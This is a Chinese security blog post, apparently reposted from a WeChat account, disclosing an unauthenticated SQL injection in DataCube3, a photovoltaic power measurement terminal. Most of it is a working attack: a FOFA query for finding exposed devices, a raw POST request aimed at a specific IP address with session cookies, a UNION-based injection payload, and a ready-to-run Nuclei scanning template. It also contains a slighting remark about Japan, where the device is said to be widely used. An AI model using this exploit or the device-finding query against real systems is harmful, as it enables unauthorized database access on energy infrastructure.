DataCube3 getting_index_data.php SQL注入漏洞

admin 2024年4月20日07:41:56评论12 views字数 1983阅读6分36秒阅读模式

0x00 阅读须知

免责声明:本文提供的信息和方法仅供网络安全专业人员用于教学和研究目的,不得用于任何非法活动。读者若使用文章内容从事任何未授权的行为,需自行承担所有法律责任和后果。本公众号及作者对由此引起的任何直接或间接损失不负责任。请严格遵守相关法律法规。

0x01 漏洞简介

DataCube3是一个用于光伏电力生成系统的紧凑型终端测量系统。这个系统在1.0版本中被发现存在未经身份验证的SQL注入漏洞,可允许未认证的恶意用户在数据库中执行任意SQL查询 。小日子国家用得比较多。

DataCube3 getting_index_data.php SQL注入漏洞

0x02 漏洞详情

fofa:title="DataCube3"

Poc:

POST /admin/pr_monitor/getting_index_data.php HTTP/1.1Host: 118.241.255.169:30110User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: SESS_IDS=m70644umgu9qhcblivgqvbfhpd; PHPSESSID=fqf954nsik4j80md6mu1jd1fhkUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 9req_id=1*

pyload:

1) UNION ALL SELECT CHAR(113,120,107,107,113)||CHAR(117,78,85,110,71,119,86,122,111,101,81,87,68,72,80,107,90,112,111,110,120,72,78,70,76,99,100,81,80,77,89,75,86,65,105,99,74,67,122,107)||CHAR(113,106,120,122,113),NULL,NULL-- sTqG

DataCube3 getting_index_data.php SQL注入漏洞

0x03 Nuclie

id: DataCube3-getting_index_data-sqliinfo:  name: DataCube3-getting_index_data-sqli  author: unknow  severity: high  description: DataCube3 getting_index_data.php SQL注入漏洞  tags: DataCube3, sqli  metadata:    fofa-query: title="DataCube3"http:  - raw:      - |                      POST /admin/pr_monitor/getting_index_data.php HTTP/1.1        Host:         User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0        Accept: */*        Accept-Encoding: gzip, deflate        Connection: close        Upgrade-Insecure-Requests: 1        Content-Type: application/x-www-form-urlencoded        Content-Length: 9        req_id=1) UNION ALL SELECT CHAR(113,120,107,107,113)||CHAR(117,78,85,110,71,119,86,122,111,101,81,87,68,72,80,107,90,112,111,110,120,72,78,70,76,99,100,81,80,77,89,75,86,65,105,99,74,67,122,107)||CHAR(113,106,120,122,113),NULL,NULL-- sTqG    matchers:           - type: dsl        name: sqli        dsl:          - '(status_code==200 && contains(body, "qxkkquNUnGwVzoeQWDHPkZponxHNFLcdQPMYKVAicJCzkqjxzq"))'

DataCube3 getting_index_data.php SQL注入漏洞

原文始发于微信公众号(贫僧法号云空):DataCube3 getting_index_data.php SQL注入漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月20日07:41:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   DataCube3 getting_index_data.php SQL注入漏洞http://cn-sec.com/archives/2674712.html

发表评论

匿名网友 填写信息